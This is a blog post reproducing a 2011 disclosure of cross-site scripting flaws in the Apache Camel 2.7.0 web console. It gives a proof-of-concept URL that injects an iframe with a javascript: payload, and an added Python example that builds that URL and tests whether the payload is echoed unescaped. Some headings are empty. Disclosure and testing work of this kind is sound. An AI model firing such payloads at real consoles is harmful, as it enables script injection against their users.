Sunday, April 29, 2012

Apache Camel 2.7.0 Multiple Cross-Site Scripting (XSS) Vulnerabilities

Apache Camel is a versatile open-source integration framework based on known Enterprise Integration Patterns. Camel empowers you to define routing and mediation rules in a variety of domain-specific languages, including a Java-based Fluent API, Spring or Blueprint XML Configuration files, and a Scala DSL.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple cross-site scripting vulnerabilities in Apache Camel. These issues were discovered in a default installation of Apache Camel 2.7.0. Earlier versions may also be affected.

Proof of concept
Reflected XSS

Permanent XSS
http://[target]:8161/camel/endpoints/mock:someName<iframe src="javascript:alert('Permanent XSS')"
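The PoC above works because the endpoint name taken from the URL path is written into the console's HTML without escaping, so the `<iframe ...>` in the name becomes live markup when the endpoint page is rendered. The following Python is an added example, not code from the advisory or from Apache Camel: the two `render_*` functions are constructed stand-ins for a page that echoes the endpoint name (one raw, one HTML-escaped), `poc_url` rebuilds the advisory's URL with the name percent-encoded as a single path segment, and `reflects_unescaped` is the check a tester would run over a fetched response body to decide whether the payload reached the HTML unencoded. The host name `target` and the markup of the stand-in pages are assumptions.

```python
import html
from urllib.parse import quote

# Payload from the advisory's permanent-XSS PoC (the endpoint-name part of the path).
PAYLOAD = 'mock:someName<iframe src="javascript:alert(\'Permanent XSS\')"'


def poc_url(host: str, endpoint: str, port: int = 8161) -> str:
    """Build the PoC URL from the advisory, percent-encoding the endpoint name so it
    survives as one path segment (':' is kept, as in 'mock:someName')."""
    return f"http://{host}:{port}/camel/endpoints/{quote(endpoint, safe=':')}"


def render_vulnerable(endpoint_name: str) -> str:
    """Constructed stand-in for a console page that echoes the endpoint name raw.
    This is not the Camel console's code; it only models the defect class."""
    return f"<html><body><h1>Endpoint: {endpoint_name}</h1></body></html>"


def render_hardened(endpoint_name: str) -> str:
    """Same constructed page with the name HTML-escaped before it is embedded,
    which is the generic fix for this class of bug: '<' becomes '&lt;', quotes
    become entities, so the browser never sees an element or attribute."""
    escaped = html.escape(endpoint_name, quote=True)
    return f"<html><body><h1>Endpoint: {escaped}</h1></body></html>"


def reflects_unescaped(page: str, payload: str) -> bool:
    """Check a fetched response body: True if the payload appears verbatim
    (the '<' and quotes reached the HTML unencoded), False if it was escaped
    or is absent. Feed it the body of the endpoint page after sending the PoC."""
    return payload in page


if __name__ == "__main__":
    print(poc_url("target", PAYLOAD))
    print("vulnerable page reflects payload:",
          reflects_unescaped(render_vulnerable(PAYLOAD), PAYLOAD))
    print("hardened page reflects payload:",
          reflects_unescaped(render_hardened(PAYLOAD), PAYLOAD))
```

A `True` from `reflects_unescaped` on a real response means the name was rendered raw; a `False` with the entity-encoded form present (`&lt;iframe`) means output encoding is in place, which is the behaviour the fixed release should show.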

To trigger Permanent XSS:

Solution
Update to version 2.7.2 or later.


Vendor URL:

Disclosure Timeline
2011-05-06 - Vulnerabilities discovered.
2011-05-06 - Vulnerabilities reported to Secunia.
2011-05-06 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-05-19 - Patch released.
2011-05-19 - Advisory published by Apache.

